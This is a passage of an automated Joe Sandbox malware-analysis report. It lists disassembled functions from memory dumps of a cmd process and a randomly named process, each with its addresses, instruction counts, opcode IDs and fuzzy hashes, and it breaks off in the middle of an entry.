                                      Function 00007FF886EB1C6D Relevance: .0, Instructions: 42COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 134337a0cb883f5c7265298eb8294598d9bfbe467736b93fbf7317a4396a767a
                                      • Instruction ID: b9bb9fd118b88aebac5b1f48be4133159bbc12c02df9bd6d89431edc0344980a
                                      • Opcode Fuzzy Hash: 134337a0cb883f5c7265298eb8294598d9bfbe467736b93fbf7317a4396a767a
                                      • Instruction Fuzzy Hash: 8E01D13090964D8FEB99DF14845A2FA3BA0FF59310F68007AD808C6191CA35D850CB80
                                      Function 00007FF886EB0610 Relevance: .0, Instructions: 42COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9c4503b740d6c41850aa0c167a617c87858254836757aa0890f5d87c9f329948
                                      • Instruction ID: 7c11c3cdf9bde6e6910f84fa41825fd6cf12104e67711834317501b52aa1851e
                                      • Opcode Fuzzy Hash: 9c4503b740d6c41850aa0c167a617c87858254836757aa0890f5d87c9f329948
                                      • Instruction Fuzzy Hash: B401D13091851E9FEB48EB64C0592B973E0FF08345F60087ED40EE21D1DE79A990C601
                                      Function 00007FF886EB0608 Relevance: .0, Instructions: 42COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f4b4a04022f1d92aa8f8fa1f9320b5c04667482e45aa62795d03627a697065aa
                                      • Instruction ID: b19bd0d21a16b8445d9e0d16050de85f595448618314a7c4672e7da5fcb2c2ed
                                      • Opcode Fuzzy Hash: f4b4a04022f1d92aa8f8fa1f9320b5c04667482e45aa62795d03627a697065aa
                                      • Instruction Fuzzy Hash: 1201AF3092851E9FEB59EF64C45A2BA73A0FF18344FA008BEE41ED61D1DF79A990C701
                                      Function 00007FF886EB1140 Relevance: .0, Instructions: 41COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 94c108e68c58f5691af5c187e66e67e6cd1fd574d30f8f730fbb3be5aa176c7a
                                      • Instruction ID: 9f4fe7548401c8216a947d52e80e73327fc52bc1c0199c9dd068cc00f7ebb171
                                      • Opcode Fuzzy Hash: 94c108e68c58f5691af5c187e66e67e6cd1fd574d30f8f730fbb3be5aa176c7a
                                      • Instruction Fuzzy Hash: B1F0F430D1861E89FB989B6898483FA77E0FF66361F18057AD409E20C1DE341858C640
                                      Function 00007FF886EB05D0 Relevance: .0, Instructions: 39COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d3bdd292219c0ef9512caa8e5bc8aaf677917915682f86626eac41c4d01fefcf
                                      • Instruction ID: f2e8cbee68fe69922721d7baf51b87bafbce2096692d0af9ddee75a9a98ee37e
                                      • Opcode Fuzzy Hash: d3bdd292219c0ef9512caa8e5bc8aaf677917915682f86626eac41c4d01fefcf
                                      • Instruction Fuzzy Hash: D0F0F03081960E8FEB89EF2494452FA37A0FF19354F68053AE80DD7181CB39E8A0CB81
                                      Function 00007FF886EB2729 Relevance: .0, Instructions: 35COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e3fca14af1ad70f05c63e7e8fe341ae65aa864918d12d7e093f62c7577655f49
                                      • Instruction ID: 3213706e1d55ff5699415390b01820ebd50cb7a82bfad996e5d3be3e4d3a2502
                                      • Opcode Fuzzy Hash: e3fca14af1ad70f05c63e7e8fe341ae65aa864918d12d7e093f62c7577655f49
                                      • Instruction Fuzzy Hash: 14F0FC31C1D3998FDB569F2484252F93B70FF05340F9904BED449C60D2DB789854C741
                                      Function 00007FF886EB279D Relevance: .0, Instructions: 31COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 086db628a99fb6673c65b0a8a0b08662b746a8c27aef5cfad0d1ac6267280c1c
                                      • Instruction ID: 0c62a60cd74a45df4f8a2ff6ca640045c6f8cd4600c3e6c3d33e4fc45f7034b9
                                      • Opcode Fuzzy Hash: 086db628a99fb6673c65b0a8a0b08662b746a8c27aef5cfad0d1ac6267280c1c
                                      • Instruction Fuzzy Hash: 20F0247081D68A8FEB589F24882A2B93BA0FF06354F9804BEE409C60D2DF799850C341

                                      Executed Functions

                                      Function 00007FF886ED3545 Relevance: 1.5, Strings: 1, Instructions: 266COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1513290628.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: W_H
                                      • API String ID: 0-126398842
                                      • Opcode ID: 83cdb7b1f2cfca808db3d9035b2526bb18e5f2d625104cad020a0584ca747c19
                                      • Instruction ID: 72c3d78880b92f751615bd80a623ab0551db5ce31fb3d1425836c570b755d766
                                      • Opcode Fuzzy Hash: 83cdb7b1f2cfca808db3d9035b2526bb18e5f2d625104cad020a0584ca747c19
                                      • Instruction Fuzzy Hash: EC91A071E289498FE794DB6CD8653EDBBE1FB6A390F5400BAC00DD72C6DB685805C741
                                      Function 00007FF886ED03BD Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1513290628.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: sQ^
                                      • API String ID: 0-1726393085
                                      • Opcode ID: 4055c60bcac59b6047ec321c244ebad10ca9691ebe4e871242164bffa1f86b72
                                      • Instruction ID: 4c27f76f5e4c7656c65ed5eca80e75f008db9a1577e29b432a89a914f9aaff8d
                                      • Opcode Fuzzy Hash: 4055c60bcac59b6047ec321c244ebad10ca9691ebe4e871242164bffa1f86b72
                                      • Instruction Fuzzy Hash: 6B51D752D0D6D25BE215AA7CAC565E97F50FF623A4B1C41FBC08C8A093DD09AC4AC396
                                      Function 00007FF886ED0515 Relevance: .4, Instructions: 386COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1513290628.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a8403f99686eb58f8fac536645bfc74f56f8240e4daae853bedb5f164d897370
                                      • Instruction ID: 7f4506bef18bb54e62d2691e57855430c2139097c904802bcd6202e370e609a3
                                      • Opcode Fuzzy Hash: a8403f99686eb58f8fac536645bfc74f56f8240e4daae853bedb5f164d897370
                                      • Instruction Fuzzy Hash: 0CB12403E0E5DA4AE2117AACBC591F97F90FF523A4B1C82B7D08C8A1D7DD1C98468296
                                      Function 00007FF886ED05A0 Relevance: .3, Instructions: 314COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1513290628.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7384c5cd3f97542189bddf72baacdd8d02fa5cc118558129dac69d4777b53d57
                                      • Instruction ID: d70c9ce7277920d2eb50f56636b0a0f560c1ad22c4f72d6b364868e5caf15d1d
                                      • Opcode Fuzzy Hash: 7384c5cd3f97542189bddf72baacdd8d02fa5cc118558129dac69d4777b53d57
                                      • Instruction Fuzzy Hash: A5910402E1E5D64EE2116ABCBC591F97F90FF523A4B1C82F7D0888F1D7DD1C98468296
                                      Function 00007FF886ED05ED Relevance: .3, Instructions: 304COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1513290628.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 95a37b0c57dc9815c45c68ddfe6ba65be022023f423767aa62d8647c8550bed0
                                      • Instruction ID: b579b044a4094c5d83edb1da7a14f96299fdc843d895ed6b33545cd359ac0c45
                                      • Opcode Fuzzy Hash: 95a37b0c57dc9815c45c68ddfe6ba65be022023f423767aa62d8647c8550bed0
                                      • Instruction Fuzzy Hash: B2912302E0E6D64FE2116ABCAC191F97F90FF523A0B1C82F7D0888B1D7DD189846C292
                                      Function 00007FF886ED16B8 Relevance: .3, Instructions: 285COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1513290628.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8779a2164d3fd2d56926c594a4d56de099f4220e842663fb0cff5a68a003723f
                                      • Instruction ID: 754ceb38c10c803716b7878dcf88876e2e5eedaeb93557542587b1cb0881c684
                                      • Opcode Fuzzy Hash: 8779a2164d3fd2d56926c594a4d56de099f4220e842663fb0cff5a68a003723f
                                      • Instruction Fuzzy Hash: 8B819D31A1CA498BDB58DE5C98556B977E2FFD9741F24427EE44EC3282CE34AC02C781
                                      Function 00007FF886ED0640 Relevance: .3, Instructions: 265COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1513290628.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 010ea11bf09f877a3fb2b2ec35c25868228275b9be94e423d8b6a3ad29ad874e
                                      • Instruction ID: b26185641c65eb062a09b5418ae3106f6bf4d30c652b5b7c2973c3e63189bf71
                                      • Opcode Fuzzy Hash: 010ea11bf09f877a3fb2b2ec35c25868228275b9be94e423d8b6a3ad29ad874e
                                      • Instruction Fuzzy Hash: 1C711512E1E6D64EE2116ABCBC191F96F90FF523A0B1C92F7D0898F1DBDC1C9846C295
                                      Function 00007FF886ED05B0 Relevance: .2, Instructions: 242COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1513290628.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 516f4a8d42984600c4d759998f78897db977915a4381b981822008bb920383ff
                                      • Instruction ID: 10192cb2bd3bc4ac7e285bb78e9af6d120fb7d20ba36b26f7d5274d3f591839d
                                      • Opcode Fuzzy Hash: 516f4a8d42984600c4d759998f78897db977915a4381b981822008bb920383ff
                                      • Instruction Fuzzy Hash: 0C711512E1E6964FE3116ABCAC591E97F90FF523A0F1C82B7C0888B0D7DD18A846C391
                                      Function 00007FF886ED1CED Relevance: .2, Instructions: 187COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1513290628.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a8638bfc53a9fdabe3a3c5c175878ca1f564305af06a14e9bf370d4aa8906acf
                                      • Instruction ID: dfee55b4b1489653bc410526bf387b73aa053724ed57fbf7a4188717cc8096b4
                                      • Opcode Fuzzy Hash: a8638bfc53a9fdabe3a3c5c175878ca1f564305af06a14e9bf370d4aa8906acf
                                      • Instruction Fuzzy Hash: 9E51B031A18A498FDB58DE1C88556BA77E2FFD8351B24427ED45EC7282CE34EC02CB81
                                      Function 00007FF886ED31A5 Relevance: .1, Instructions: 145COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1513290628.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c8d9bd4c3b5f95a0d83a1a44c933043cca8fb9b020d704669d8712e3cb01c1ab
                                      • Instruction ID: 6737890cbd55bdd4218f34f56aa46b4224469a4ed54e6381feab0753ca9e4371
                                      • Opcode Fuzzy Hash: c8d9bd4c3b5f95a0d83a1a44c933043cca8fb9b020d704669d8712e3cb01c1ab
                                      • Instruction Fuzzy Hash: 6C514870D0861E8FEB54EB98C4996FDBBF1FF5A350F60017AD009E7292DA38A844CB40
                                      Function 00007FF886ED0805 Relevance: .1, Instructions: 86COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1513290628.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cfd5cd1aea6070b054d69d904996708cbf448b2e7e31a8c3e37143a6a0f6ec3c
                                      • Instruction ID: deff5011f06e1c3b02d7dfa5e577dac132186bd3a8fbb5712d0433d49e0f9479
                                      • Opcode Fuzzy Hash: cfd5cd1aea6070b054d69d904996708cbf448b2e7e31a8c3e37143a6a0f6ec3c
                                      • Instruction Fuzzy Hash: E1212666E2D6869BE3016B7CDC1A2E97790FF113A4F0C4172D458CA083EE18A456C2C1
                                      Function 00007FF886ED3277 Relevance: .1, Instructions: 79COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1513290628.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 348db056f856ff5f39dcf66a22398450a9f0383a2db5a9fdefafac893ded5748
                                      • Instruction ID: 05ac98250ace339b3404463a6ec3f42fd23395b4aaeb81df8c795037bad3a7a6
                                      • Opcode Fuzzy Hash: 348db056f856ff5f39dcf66a22398450a9f0383a2db5a9fdefafac893ded5748
                                      • Instruction Fuzzy Hash: 3721E275D0851D8FEB84DB98C4956FCBBF1FF59341F60403AD109E7296CA386840DB50
                                      Function 00007FF886ED2189 Relevance: .1, Instructions: 74COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1513290628.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 36be5beeb9da3f7c0e13b0d0783df817f18506831a28686a4127a6544efd9655
                                      • Instruction ID: e67ed96ca44ccc66f9481ab48d947d0dd6930c4f9f469a55094337fa2055defc
                                      • Opcode Fuzzy Hash: 36be5beeb9da3f7c0e13b0d0783df817f18506831a28686a4127a6544efd9655
                                      • Instruction Fuzzy Hash: E111933092CA4A4FE745E778845A2B977E0FF46384F1144B6D41DC7493DE2CA889C752
                                      Function 00007FF886ED339F Relevance: .1, Instructions: 69COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1513290628.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cf374dcd1187aa3d23ab786f4c192f1030a230550ea98c616ce88dcefb800076
                                      • Instruction ID: 38c0e6aa438b87c3e11795df0684869039ebe91601478c7bb56391833b807d8f
                                      • Opcode Fuzzy Hash: cf374dcd1187aa3d23ab786f4c192f1030a230550ea98c616ce88dcefb800076
                                      • Instruction Fuzzy Hash: A1219D3094D69A8FEB42EB7888586A97FF0FF4B350F1904F6D458CB0A3DA6D9846C711
                                      Function 00007FF886ED0A01 Relevance: .1, Instructions: 66COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1513290628.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9a9a6ae074ff1a613b94c2511a43a214e608214a75709e2bc5f16d0892b24ab9
                                      • Instruction ID: 870f4c3c9d5577b15f40c3a882394bc7096304637713f88c3056e12e83f88511
                                      • Opcode Fuzzy Hash: 9a9a6ae074ff1a613b94c2511a43a214e608214a75709e2bc5f16d0892b24ab9
                                      • Instruction Fuzzy Hash: 34118F30D18A0E9EE790EF68C8492BD77E0FF58341F5545B6C41DC7192EE38A944C740
                                      Function 00007FF886ED112D Relevance: .1, Instructions: 59COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1513290628.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4c69d9143f114f437cced8d12973c3eb39e92b865362a8f03ee7420f30395da7
                                      • Instruction ID: 3bf9d82c4737c4c1ce0e6f2b07ba3a4bbfe5ed6bb1bc27bd3ae65b8e587d52fd
                                      • Opcode Fuzzy Hash: 4c69d9143f114f437cced8d12973c3eb39e92b865362a8f03ee7420f30395da7
                                      • Instruction Fuzzy Hash: BE11BF70918A4E8EEB999B68C8587FA7BF0FF2A351F1005BEC41AC61D3DE296844C700
                                      Function 00007FF886ED0F58 Relevance: .1, Instructions: 55COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1513290628.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d9aeb7a589e76d760b32d8c7a4d83a436c5df409b30c3e8fad9e5fb3a6554040
                                      • Instruction ID: b1daa8f25a615ec4cde6288e1dd704598521573bfca99dc85fdcf877bbc79895
                                      • Opcode Fuzzy Hash: d9aeb7a589e76d760b32d8c7a4d83a436c5df409b30c3e8fad9e5fb3a6554040
                                      • Instruction Fuzzy Hash: 82117331D18A0E8BEB54EF68D855BEDB7A2FF54350F344279C409AB196CE386D42CB84
                                      Function 00007FF886ED34C5 Relevance: .1, Instructions: 52COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1513290628.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b8e7c9564f9abe2a71743c289b56538c0592dd3826c1d260258d889bbd8cd2fc
                                      • Instruction ID: f197f3e689f187c72d874639106f08e71f9c5249baa06088c11becd8d1ab1044
                                      • Opcode Fuzzy Hash: b8e7c9564f9abe2a71743c289b56538c0592dd3826c1d260258d889bbd8cd2fc
                                      • Instruction Fuzzy Hash: DB115E7091864E8FEB44EB68C8596BA7BE0FF19305F5005BED41AC3192DB39A540C701
                                      Function 00007FF886ED05D8 Relevance: .0, Instructions: 50COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1513290628.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8e4ea50c7e6c4df1399d86e9abda16eb9f11eee09797f426451e8f08cb5c7ddb
                                      • Instruction ID: 5176c46ee86f2d019d7fc6e8d30061eb26997b6a67a5ce87ac2d3a1a3ad34aa1
                                      • Opcode Fuzzy Hash: 8e4ea50c7e6c4df1399d86e9abda16eb9f11eee09797f426451e8f08cb5c7ddb
                                      • Instruction Fuzzy Hash: 3F015E30A0890E8FEB99EF68C4556FA77A1FF58344F60457ED41EC7192CA36A950CB41
                                      Function 00007FF886ED2E31 Relevance: .0, Instructions: 50COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1513290628.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6156d6b40f403d2a11ab4f6c4538e79f4e7e51c05c7b10b4bc1c0eb9dd692a61
                                      • Instruction ID: ee6fc7df1a39b80524cdb3bea0b1f7d513f9b79bf74a86ef74759bfaba89f3cf
                                      • Opcode Fuzzy Hash: 6156d6b40f403d2a11ab4f6c4538e79f4e7e51c05c7b10b4bc1c0eb9dd692a61
                                      • Instruction Fuzzy Hash: D4018F3091864E9FE752EB78C4496A97BE0FF1A340F5149B6D818C70A2EB38E444C601
                                      Function 00007FF886ED2EA9 Relevance: .0, Instructions: 45COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1513290628.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4bac09f003946da5670d2bdc14cee15ad1f3e6d9279e53449faeed852259b4c9
                                      • Instruction ID: cb6c613c69de1a1fd4e950a743fad0072bf887ab0113596b6459cf5a79695f97
                                      • Opcode Fuzzy Hash: 4bac09f003946da5670d2bdc14cee15ad1f3e6d9279e53449faeed852259b4c9
                                      • Instruction Fuzzy Hash: EF017131D5D6894FE752AB78885A5A97BE0FF49340F1609F7D908CB0A3EA2CA884C701
                                      Function 00007FF886ED280D Relevance: .0, Instructions: 44COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1513290628.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6fd5b5af277883329eb2d28d2ac0dccdbccf7a19e244dbc70172607ea07f8040
                                      • Instruction ID: e17cd519c82e137246d77da288008320082d10a7c6f4a2746e85b8917aa0b010
                                      • Opcode Fuzzy Hash: 6fd5b5af277883329eb2d28d2ac0dccdbccf7a19e244dbc70172607ea07f8040
                                      • Instruction Fuzzy Hash: CD018B74D1864E8FEB91EB68848D7B97BE0FF59341F1545BAD808C60A2EA38E584C701
                                      Function 00007FF886ED0610 Relevance: .0, Instructions: 42COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1513290628.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ebf77a157c3fd967808c5ec2d5da589520d56c2da0122e6399358fb0ed74d14f
                                      • Instruction ID: f9537640c1ba5231fe7ea78dd020ecf4bc2e522d31fa8ef322b43cf66f9b0f2d
                                      • Opcode Fuzzy Hash: ebf77a157c3fd967808c5ec2d5da589520d56c2da0122e6399358fb0ed74d14f
                                      • Instruction Fuzzy Hash: F501313091850EAFEB68EB68C4596B977E0FF18345F60087ED41EC61D2DE39A990C611
                                      Function 00007FF886ED0608 Relevance: .0, Instructions: 42COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1513290628.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 681ac945a8b7d5f5d612ee1aec1c76ced406da19b68eb68917d033ab7623fe85
                                      • Instruction ID: fee511ce182148a18523f624715144315859d11be7f51d6a3383cc8edf5ceb8d
